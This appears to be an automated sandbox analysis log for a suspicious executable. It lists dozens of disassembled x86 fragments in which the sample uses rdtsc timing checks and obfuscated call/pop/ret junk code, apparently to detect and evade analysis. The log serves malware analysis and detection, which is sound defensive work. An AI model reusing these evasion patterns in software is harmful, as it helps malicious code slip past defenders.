              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBE2BE second address: FBE35C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c call 00007F646C53F7AEh 0x00000011 xor dword ptr [ebp+122D2796h], edi 0x00000017 pop edi 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F646C53F7A8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jnc 00007F646C53F7ACh 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F646C53F7A8h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 00000014h 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 xor dword ptr [ebp+1245AA4Ah], edx 0x0000005c jmp 00007F646C53F7B9h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBBF3D second address: FBBF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBE35C second address: FBE370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646C53F7AFh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FBF2A8 second address: FBF31C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F646CD14783h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 add edi, dword ptr [ebp+122D3646h] 0x00000017 jmp 00007F646CD14787h 0x0000001c push 00000000h 0x0000001e mov edi, 03BD092Dh 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007F646CD14778h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f mov edi, dword ptr [ebp+122D3C10h] 0x00000045 mov dword ptr [ebp+122D3121h], edi 0x0000004b push eax 0x0000004c push ebx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC02C0 second address: FC02DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC11E8 second address: FC1238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub edi, dword ptr [ebp+122D3B78h] 0x00000012 mov edi, dword ptr [ebp+122D3C18h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F646CD14778h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 xchg eax, esi 0x00000037 js 00007F646CD14784h 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 pop ecx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC1238 second address: FC123C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC058B second address: FC058F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC2284 second address: FC2288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC2288 second address: FC228E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC13FD second address: FC1425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F646C53F7ACh 0x0000000c je 00007F646C53F7A6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F646C53F7B2h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC1425 second address: FC142F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F646CD14776h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC142F second address: FC14CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F646C53F7A8h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 jmp 00007F646C53F7AEh 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F646C53F7A8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr fs:[00000000h], esp 0x00000050 mov edi, dword ptr [ebp+122D3058h] 0x00000056 mov eax, dword ptr [ebp+122D0EE1h] 0x0000005c push FFFFFFFFh 0x0000005e mov edi, dword ptr [ebp+12449D8Ah] 0x00000064 nop 0x00000065 pushad 0x00000066 jnl 00007F646C53F7ACh 0x0000006c jc 00007F646C53F7A8h 0x00000072 push esi 0x00000073 pop esi 0x00000074 popad 0x00000075 push eax 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 jne 00007F646C53F7A6h 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC33A9 second address: FC33D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14780h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F646CD14780h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC4379 second address: FC437F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC63AB second address: FC63AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC63AF second address: FC63B9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC63B9 second address: FC643C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F646CD1477Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F646CD1477Ah 0x00000011 push ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F646CD14778h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 sub dword ptr [ebp+1245AA4Fh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F646CD14778h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 or dword ptr [ebp+122D33DAh], ebx 0x00000058 push 00000000h 0x0000005a sub bx, 6154h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F646CD14780h 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC54FF second address: FC5503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC5503 second address: FC5507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC5507 second address: FC55AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F646C53F7B0h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D393Eh], edi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jmp 00007F646C53F7B9h 0x00000020 pushad 0x00000021 movzx edx, si 0x00000024 add edi, dword ptr [ebp+122D3997h] 0x0000002a popad 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 cld 0x00000033 mov eax, dword ptr [ebp+122D0515h] 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F646C53F7A8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007F646C53F7A8h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 00000015h 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f mov di, dx 0x00000072 push eax 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC55AA second address: FC55AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35A7 second address: FC35AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC752E second address: FC7534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC657A second address: FC657E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35AD second address: FC35BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC657E second address: FC6600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D33C3h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov bx, DF51h 0x0000001b mov bx, 6AFAh 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F646C53F7A8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 mov bh, dl 0x00000042 mov eax, dword ptr [ebp+122D0669h] 0x00000048 mov dword ptr [ebp+122D3772h], ecx 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007F646C53F7A8h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a or di, 2EF5h 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jnl 00007F646C53F7A6h 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35BC second address: FC35C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35C0 second address: FC35CA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35CA second address: FC35D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35D0 second address: FC35D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC35D4 second address: FC366B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D202Ch], ecx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F646CD14778h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+122D3A94h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d cld 0x0000003e mov eax, dword ptr [ebp+122D1409h] 0x00000044 mov dword ptr [ebp+122D3892h], edx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push edi 0x0000004f call 00007F646CD14778h 0x00000054 pop edi 0x00000055 mov dword ptr [esp+04h], edi 0x00000059 add dword ptr [esp+04h], 0000001Bh 0x00000061 inc edi 0x00000062 push edi 0x00000063 ret 0x00000064 pop edi 0x00000065 ret 0x00000066 mov edi, dword ptr [ebp+122D33FAh] 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f jnp 00007F646CD1478Ch 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC366B second address: FC3687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7B8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC3687 second address: FC3699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F646CD1477Eh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC94FC second address: FC9500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC960A second address: FC9623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14784h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC9623 second address: FC962D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F646C53F7A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FC96EA second address: FC9704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F646CD14776h 0x0000000a popad 0x0000000b push eax 0x0000000c je 00007F646CD14784h 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F646CD14776h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FCA4F3 second address: FCA575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 adc bl, FFFFFFA0h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F646C53F7A8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d movsx edi, cx 0x00000030 mov ebx, dword ptr [ebp+122D3772h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov eax, dword ptr [ebp+122D033Dh] 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F646C53F7A8h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d push ecx 0x0000005e pop ebx 0x0000005f push FFFFFFFFh 0x00000061 mov ebx, dword ptr [ebp+122D38AFh] 0x00000067 nop 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b push edi 0x0000006c pop edi 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FCA575 second address: FCA583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F646CD14776h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD20AC second address: FD20B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD2212 second address: FD2241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F646CD14776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F646CD14776h 0x00000016 jmp 00007F646CD14789h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD23C1 second address: FD23C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD23C7 second address: FD23F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F646CD14789h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push ebx 0x00000010 ja 00007F646CD14776h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD70A8 second address: FD70AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD70AE second address: FD70F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F646CD1477Fh 0x00000017 jmp 00007F646CD14784h 0x0000001c popad 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD70F1 second address: FD70FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646C53F7AAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD7326 second address: FD7338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD7338 second address: FD734E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F646C53F7A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD734E second address: E07EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F646CD14788h 0x00000011 pop eax 0x00000012 stc 0x00000013 push dword ptr [ebp+122D0AA5h] 0x00000019 jns 00007F646CD1478Bh 0x0000001f call dword ptr [ebp+122D29CCh] 0x00000025 pushad 0x00000026 stc 0x00000027 xor eax, eax 0x00000029 jl 00007F646CD14788h 0x0000002f jmp 00007F646CD14782h 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D3451h], esi 0x0000003e sub dword ptr [ebp+122D3451h], edx 0x00000044 mov dword ptr [ebp+122D3AE0h], eax 0x0000004a cld 0x0000004b mov esi, 0000003Ch 0x00000050 clc 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 jmp 00007F646CD1477Ah 0x0000005a lodsw 0x0000005c mov dword ptr [ebp+122D24F3h], esi 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 cmc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b jnl 00007F646CD1477Ch 0x00000071 nop 0x00000072 pushad 0x00000073 push eax 0x00000074 jl 00007F646CD14776h 0x0000007a pop eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDE10F second address: FDE113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDCE8F second address: FDCE94 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD467 second address: FDD471 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F646C53F7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD605 second address: FDD613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD780 second address: FDD786 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD786 second address: FDD7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jo 00007F646CD147AAh 0x0000000d jno 00007F646CD1477Eh 0x00000013 pushad 0x00000014 jmp 00007F646CD14782h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD8E7 second address: FDD8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD8EB second address: FDD8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD8EF second address: FDD8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDDA45 second address: FDDA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F646CD14776h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDDCF5 second address: FDDCF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDDE10 second address: FDDE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDDE14 second address: FDDE23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE246F second address: FE2473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2473 second address: FE247E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE247E second address: FE2484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE25D7 second address: FE25DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
